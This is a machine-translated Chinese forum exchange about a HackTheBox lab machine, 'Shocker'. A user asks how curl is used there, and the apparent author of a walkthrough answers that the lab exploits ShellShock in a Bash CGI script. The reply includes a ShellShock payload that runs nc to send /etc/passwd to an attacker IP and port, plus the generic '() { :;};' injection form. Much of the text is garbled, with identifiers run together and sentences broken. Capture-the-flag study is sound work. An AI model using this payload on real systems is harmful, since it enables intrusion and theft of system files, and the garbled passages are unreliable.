请帮我解答疑问 在黑客平台中,我遵循其中一台机器的书面说明 https://benheater.com/hackthebox-shocker/ i Sack 在目标端页面特异性的中间 这家伙如何使用curl来编辑文件 我尝试金钱乘以一些混乱的东西
请查找上面页面的链接
我尝试使用curl,但我除了使用curl的答案
curl 在目标端的用法
我是您上面链接的文章的作者。
这家伙如何使用curl来编辑文件
我根本没有使用
curl在这个特定的 HackTheBox 目标 Shocker 上,您的任务是查找并利用目标服务器上 Bash CGI 脚本上的 ShellShock 漏洞。
正如您应该在我的文章中的
curl# Set some variables to hold the payload
ATTACK_IP='10.10.14.3'
ATTACK_PORT=80
PWN="() { :;}; /bin/bash -c 'nc -n $ATTACK_IP $ATTACK_PORT < /etc/passwd'"
ATTACK_IPATTACK_PORTncPWNnc/etc/passwdnc如果您还没有这样做,请花一些时间熟悉 ShellShock 负载
() { :;}; some_command_here;some_command_heresome_command_here 希望有帮助。